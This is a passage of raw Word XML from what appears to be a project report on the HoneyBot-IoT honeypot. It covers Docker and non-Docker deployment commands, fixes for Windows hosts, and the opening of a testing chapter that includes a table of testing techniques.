      </w:r>
    </w:p>
    <w:p w14:paraId="6A36E051" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build and start the stack: docker compose up -d --build. The firewall service applies outbound isolation automatically before the honeypots start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36E051" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify: docker compose ps shows every service Up and db, api and firewall healthy; docker compose exec firewall firewall.sh status lists the rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36E051" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Optional GeoIP: deploy/get_geoip.sh, then docker compose restart api intel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36E051" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Optional monitoring: docker compose --profile monitoring up -d (Grafana on 127.0.0.1:3000).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36E051" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open the dashboard at http://&lt;host&gt;/ (user admin) and generate test traffic with docker compose --profile sim run --rm attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36E051" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Backups: docker compose run --rm backup once | list | verify &lt;stamp&gt; | restore &lt;stamp&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On Windows 10/11 the same stack runs on Docker Desktop with the WSL 2 back-end; all commands are typed in PowerShell. Since Version 2.1 the dashboard password is generated inside the auth-init container, so the PowerShell encoding step of the 60% build is no longer needed. A Windows host remains for local laboratory use only. The figure below shows the 60% stack started on Windows and verified through Nginx.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5120640" cy="1864603"/>
            <wp:docPr id="38" name="Picture 38"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="term_windows.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5120640" cy="1864603"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">35</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: HoneyBot-IoT 60% Stack Running on Windows (Docker Desktop) — Services Started and Health Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deployment on Windows exposed three issues that were fixed in the 60% increment and are part of the build:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dashboard unreachable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nginx was attached only to the internal backnet, and Docker does not publish ports of containers on internal-only networks. A frontnet bridge network was added for Nginx.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Map tiles blocked:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the CARTO basemap now requires an API key; the dashboard was switched to OpenStreetMap tiles (no key) with a dark CSS filter. Since Version 2.1 the map is drawn offline with d3-geo and needs no tiles at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet counter always 0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the dashboard looked up the key TELNET while the API returns Telnet; a protocol-key map fixes the Telnet card and the doughnut chart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9034" w:name="_Toc69034"/>
      <w:r>
        <w:t xml:space="preserve">Running Without Docker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9034"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For development the services can also run without Docker. PostgreSQL 16 and Redis 7 are started locally, DATABASE_URL and REDIS_URL are exported, init.sql is loaded, and each module is started in its own terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python device_state/device_state.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python ssh_honeypot/ssh_honeypot.py (:2222), python telnet_honeypot/telnet_honeypot.py (:2323)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python http_honeypot/http_honeypot.py (:8080/8443/8081/8082), python mqtt_honeypot/mqtt_honeypot.py (:1883)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python rtsp_honeypot/rtsp_honeypot.py (:8554), python intel/engine.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python -m uvicorn api.api:app --port 5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC7BC08" w14:textId="2205920E" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9035" w:name="_Toc69035"/>
      <w:r>
        <w:t xml:space="preserve">8. Testing and Evaluation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9035"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This chapter describes the testing and evaluation of HoneyBot-IoT. The protocol, engine, business-rule and integration test cases of Sections 8.1–8.4 were executed on the 60% build against a laboratory stack with six simulated attackers; their behaviour is unchanged in v0.7. For Version 2.1 the automated suite was extended to 78 tests and re-run on the v0.7 code, and Section 8.6 adds the acceptance tests of the 70% features, executed on a full docker compose deployment attacked by the bundled simulator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Five testing techniques are applied in sequence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">13</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Testing Techniques Applied</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000"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="5560"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w14:paraId="00C73242" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="25B10275" w14:textId="77777777" w:rsidR="005C6601" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Testing Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="12B80797" w14:textId="77777777" w:rsidR="005C6601" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3907F177" w14:textId="77777777" w:rsidR="005C6601" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="44D40E23" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Unit Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">White-box (pytest) and Black-Box</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Validate parsers, the fake shell, MITRE mapping, credential profiles, API endpoints and each honeypot service in isolation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="44D40E23" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Functional Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Black-Box</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify complete features: attack classification, correlation, IOCs and the dashboard.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="44D40E23" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Business Rules Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
